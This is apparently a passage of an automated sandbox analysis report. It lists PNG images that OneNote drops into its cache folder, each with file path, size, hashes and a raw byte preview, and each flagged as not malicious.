                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
